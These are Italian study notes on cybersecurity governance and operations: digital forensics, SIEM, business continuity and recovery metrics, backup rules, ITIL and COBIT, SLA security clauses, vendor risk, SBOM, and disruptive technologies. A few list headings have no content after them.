• Imaging forense: copia bit-per-bit del disco con hash MD5/SHA256 per verificare integrità
• Analisi artefatti: registry Windows, prefetch, log eventi, timestamp MACB (Modified, Accessed, Changed, Born)
• Timeline analysis: ricostruzione cronologica degli eventi
• Strumenti: Autopsy, FTK, Volatility (RAM), Sleuth Kit

Piattaforma che raccoglie, normalizza e correla log da tutta l'infrastruttura per rilevare minacce in tempo reale e supportare le indagini forensi.

Esempi: Splunk, IBM QRadar, Microsoft Sentinel, Elastic SIEM, Wazuh (open source).

Il BCP comprende il DRP — il DRP è il sottopiano che gestisce il ripristino IT.

Disastro accade alle 14:00
Ultimo backup alle 12:00 → RPO = 2 ore (si perdono 2 ore di dati)
Sistemi ripristinati alle 18:00 → RTO = 4 ore

Regola 3-2-1: 3 copie dei dati · su 2 supporti diversi · di cui 1 offsite (fuori sede).

Tecniche avanzate: mirroring (sincrono, RPO≈0) · snapshot · replicazione asincrona · backup immutabile (WORM — Write Once Read Many).

La regola 3-2-1 è lo standard minimo per una strategia di backup resiliente, raccomandata da CISA e da tutti i principali framework di sicurezza.

Evoluzione — Regola 3-2-1-1-0: l'aggiornamento moderno aggiunge:

• +1 copia offline/air-gapped — non raggiungibile dalla rete, immune al ransomware
• +0 errori verificati — i backup devono essere testati periodicamente. Un backup non testato è un backup che non esiste.

Tipi di backup:

ITAM (IT Asset Management) è il processo di inventario, classificazione e gestione del ciclo di vita di tutti gli asset informatici di un'organizzazione.

ITIL (Information Technology Infrastructure Library) è il framework di best practice più diffuso per la gestione dei servizi IT. Non è uno standard certificabile come ISO 27001, ma una raccolta di pratiche organizzative.

COBIT (pubblicato da ISACA) è un framework di governance e management IT che collega gli obiettivi di business agli obiettivi IT, includendo la sicurezza come componente integrata.

I framework sono complementari, non alternativi — un'organizzazione matura usa tutti e quattro in modo integrato.

Un SLA è un contratto formale tra fornitore di servizi e cliente che definisce il livello di servizio atteso, come viene misurato e cosa accade se non viene rispettato. È fondamentale per i contratti IT, outsourcing e cloud.

Calcolo disponibilità (Uptime SLA):

SLA e cybersecurity: gli SLA devono includere clausole specifiche di sicurezza:

• Incident notification: il fornitore deve notificare entro X ore (allineato con NIS2: 24h Early Warning)
• Data breach notification: obbligatorio entro 72h per GDPR
• Penetration test rights: il cliente ha diritto ad audit di sicurezza periodici
• Data location: dove fisicamente risiedono i dati (rilevante per GDPR)
• Exit strategy: come vengono restituiti e cancellati i dati alla fine del contratto

La supply chain di sicurezza riguarda i rischi introdotti da fornitori, partner, software di terze parti e hardware — qualsiasi elemento esterno che entra nell'ecosistema dell'organizzazione.

Vendor Risk Management (VRM) — processo di valutazione continua dei fornitori:

1. Inventario fornitori con classificazione per criticità e accesso
2. Questionari di sicurezza (es. SIG, CAIQ per cloud)
3. Audit periodici on-site o documentali
4. Clausole contrattuali (diritto di audit, SLA sicurezza, breach notification)
5. Monitoraggio continuo (scoring automatico, news monitoring)

Un SBOM è un inventario formale e strutturato di tutti i componenti, librerie e dipendenze che compongono un'applicazione software — l'"etichetta degli ingredienti" del software.

• Permette di sapere immediatamente se un'applicazione usa una libreria con CVE appena scoperta (es. Log4Shell)
• Richiesto dalla Executive Order USA 14028 (2021) per software venduto al governo americano
• Formato standard: SPDX (Linux Foundation) o CycloneDX (OWASP)

Una tecnologia dirompente (disruptive) è una tecnologia che trasforma radicalmente un settore, rendendo obsoleti i prodotti o modelli esistenti.

Il concetto nasce dalla teoria della "distruzione creatrice" di Joseph Schumpeter (1942): il capitalismo avanza attraverso cicli di innovazione in cui le nuove tecnologie distruggono quelle vecchie creando nuovo valore.

Esempi nel contesto cyber:

• Cloud computing → ha reso obsoleto l'hosting on-premise, creando nuovi rischi (misconfiguration, shared responsibility)
• AI/ML → abbassa la barriera per condurre attacchi sofisticati (phishing personalizzato, exploit automatizzato)
• IoT → miliardi di dispositivi connessi con sicurezza spesso inesistente → botnet Mirai
• Blockchain → elimina intermediari ma introduce nuovi vettori (smart contract, chiavi private)
• Edge computing → elaborazione distribuita → superficie di attacco distribuita

L'AI è un moltiplicatore di forza sia per i difensori che per gli attaccanti. Abbassa la barriera tecnica per condurre attacchi sofisticati.

L'edge computing sposta l'elaborazione dati vicino alla fonte (sensori, dispositivi IoT, utenti) invece che nel cloud centrale. Riduce latenza ma distribuisce la superficie di attacco.

Campi di impiego: smart factory, veicoli autonomi, telemedicina, smart city, retail analytics.

La blockchain è un registro distribuito, immutabile e crittograficamente sicuro. Ma non è intrinsecamente sicura — la sicurezza dipende dall'implementazione.